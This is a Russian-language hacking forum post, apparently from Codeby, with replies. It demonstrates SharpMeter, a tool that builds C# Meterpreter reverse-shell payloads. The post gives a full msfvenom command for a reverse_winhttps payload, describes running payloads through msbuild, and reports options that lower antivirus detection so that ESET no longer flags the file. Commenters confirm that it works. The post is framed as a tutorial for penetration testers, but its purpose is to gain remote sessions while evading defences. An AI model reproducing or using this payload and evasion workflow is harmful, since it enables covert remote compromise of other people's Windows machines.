Статья [SharpMeter] - Генератор полезных нагрузок C-sharp

1027049815.jpg


И снова здравствуйте друзья)
Коротенький пост,посмотрим сегодня функционал программы SharpMeter которая позволяет нам создавать полезные нагрузки на языке C#. Написанная на питоне. Все тривиально просто. И так качнули с гитхаба. Запустили на виндоус машине,смотрим справку:
1.PNG

Поддерживает наш скрипт два режима генерации полезной нагрузки:
Путем ввода айпи и порта атакуещего + опции
Путем добавления хекс кода + опции

И так давайте сначала первый простой метод путем создания без либо каких опций:
2.PNG
3.PNG


Видите он как и мой скрипт создает список команд для метасплоита и команду компиляции через NET Framework.
Поднимем листенер,выполним команду для компиляции:
3.PNG
5.PNG
6.PNG

Запускаем - получаем сессию
9.PNG


Что касается детекта на АВ. Вот результаты :
7.PNG

Из известных АВ детектится Есетом. Ну не FUD но тоже не плохо довольно) Если использовать с параметрами -w -x , то детект будет 7/41 но ЕСЕТ не будет палит и другие известные АВ также
Вот результат бинарника созданно с этими параметрами.
Дальше пробуем тоже самое только с дополнительными опциями:
10.PNG

Получили команду для msbuild.
Запускаем и прилетает сессия без компиляции в бинарный файл.
Ну и второй способ довольно интересный)))
Создаем полезную нагрузку через msfvenom сначала командой:
Код:
msfvenom -p windows/meterpreter/reverse_winhttps lhost=192.168.137.92 lport=1337 -f hex
11.PNG


Копипастим сроку в хексе в наш параметр для SharpMeter:
11-1.PNG


Запускаем команду msbuild - получаем сессию)

12.PNG

Все довольно просто и удобно
Всем спасибо)

 
Последнее редактирование:
Он и На Линуксе запустился, щас потестируем.
 
  • Нравится
Реакции: Sniff
Ну есесно) Это же питон) Только msbuild на линуксе врят ли отработает)
Ваша правда, если написано запускать на винде, значит, на винде. Непонятно куда делся CompileMe.exe.)) На Винде, все четко получилось.
 
  • Нравится
Реакции: <~DarkNode~>
Потестил. Спосибо. Всё прекрасно работает.
 
  • Нравится
Реакции: <~DarkNode~>
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab